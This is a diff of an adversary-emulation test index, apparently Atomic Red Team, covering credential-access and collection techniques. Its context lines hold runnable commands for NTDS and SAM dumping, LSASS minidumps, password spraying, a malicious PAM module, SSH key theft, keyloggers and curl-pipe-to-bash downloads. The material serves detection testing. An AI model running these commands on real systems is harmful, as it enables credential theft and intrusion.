-4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin -' + ' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief -' + ' get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, firewall or permissions (must be admin on target) -' + ' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell @@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) -' + ' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller -' + ' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. -' + ' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. -' + ' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo -' + ' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. -' + ' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo -' + ' executor: elevation_required: true command: | @@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt -' + ' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) -' + ' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat -' + ' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL -' + ' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key -' + ' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. -' + ' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. -' + ' supported_platforms: - linux input_arguments: @@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} -' + ' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force @@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. -' + ' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python -' + ' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" -' + ' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' T1606.002: technique: external_references: @@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials -' + ' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live registry -' + ' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} -' + ' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 -' + ' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File -' + ' supported_platforms: - windows input_arguments: @@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} -' + ' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} -' + ' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' @@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed -' + ' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' -' + ' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation -' + ' supported_platforms: - windows input_arguments: @@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) -' + ' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. -' + ' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) -' + ' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) -' + ' cleanup_command: 'rm -f #{input_file}.gz -' + ' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) -' + ' prereq_command: 'test -e #{input_file_folder} -' + ' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists -' + ' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration -' + ' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} -' + ' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet -' + ' name: powershell T1119: technique: @@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null -' + ' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. -' + ' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 -' + ' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it -' + ' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt -' + ' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore -' + ' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} -' + ' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore -' + ' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script -' + ' supported_platforms: - linux - macos @@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} -' + ' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force -' + ' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore -' + ' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" -' + ' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} -' + ' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore -' + ' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) -' + ' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -9966,16 +9966,16 @@ collection: executor: command: 